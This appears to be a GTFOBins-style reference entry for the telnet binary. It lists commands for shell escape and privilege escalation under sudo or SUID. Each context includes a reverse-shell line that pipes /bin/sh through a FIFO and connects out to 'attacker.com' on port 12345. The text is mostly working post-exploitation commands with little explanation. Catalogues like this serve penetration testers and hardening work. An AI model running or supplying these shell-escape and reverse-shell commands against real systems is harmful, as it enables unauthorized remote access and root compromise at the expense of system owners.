This executable can spawn an interactive system shell.
This function can be performed by any unprivileged user.
telnet
!/bin/sh
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
telnet
!/bin/sh
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
telnet
!/bin/sh
This executable can send back a reverse system shell to a listening attacker.
This function can be performed by any unprivileged user.
mkfifo /path/to/temp-socket
telnet attacker.com 12345 </path/to/temp-socket | /bin/sh >/path/to/temp-socket
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
mkfifo /path/to/temp-socket
telnet attacker.com 12345 </path/to/temp-socket | /bin/sh >/path/to/temp-socket
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
mkfifo /path/to/temp-socket
telnet attacker.com 12345 </path/to/temp-socket | /bin/sh >/path/to/temp-socket